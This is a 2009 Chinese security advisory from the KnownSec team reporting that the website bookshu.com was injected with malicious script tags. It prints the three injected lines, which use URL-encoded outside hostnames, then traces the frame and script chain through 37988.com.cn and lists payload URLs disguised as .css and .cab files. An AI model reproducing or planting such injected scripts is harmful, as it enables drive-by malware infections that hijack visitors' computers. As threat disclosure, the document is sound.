发布时间:Thu Apr 30 2009 17:15:16 UTC+0800
最后更新时间:Thu Apr 30 2009 17:15:16 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 不可输-读书信息网(http://www.bookshu.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.bookshu.com/
网页被嵌入恶意链接代码:
<script src=http://%6D%62%72%32%2E%63%6E></script>
<script src=http://%6D%62%72%38%2E%63%6E></script>
<script src=http://%33%38%7A%75%2E%63%6E></script>
挂马分析:
[wide]http://www.bookshu.com/
[script]http://%6d%62%72%32%2e%63%6e
[frame]http://37988.com.cn/a10/a10.htm
[frame]http://37988.com.cn/a10/new.html
[script]http://37988.com.cn/a10/../zhin.js
[frame]http://37988.com.cn/a10/../14.htm
[frame]http://37988.com.cn/a10/fx.htm
[frame]http://37988.com.cn/a10/../cx.htm
[frame]http://37988.com.cn/a10/../real10.htm
[frame]http://37988.com.cn/a10/../real11.htm
[script]http://37988.com.cn/a10/../wewew.js
[script]http://s33.cnzz.com/stat.php?1d=1382384&web_id=1382384ishow=pic
[script]http://s33.cnzz.com/stat.php?id=1382384&web_id=1382384&show=pic
[script]http://%6d%62%72%38%2e%63%6e
[script]http://%33%38%7a%75%2e%63%6e
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 5% [?]
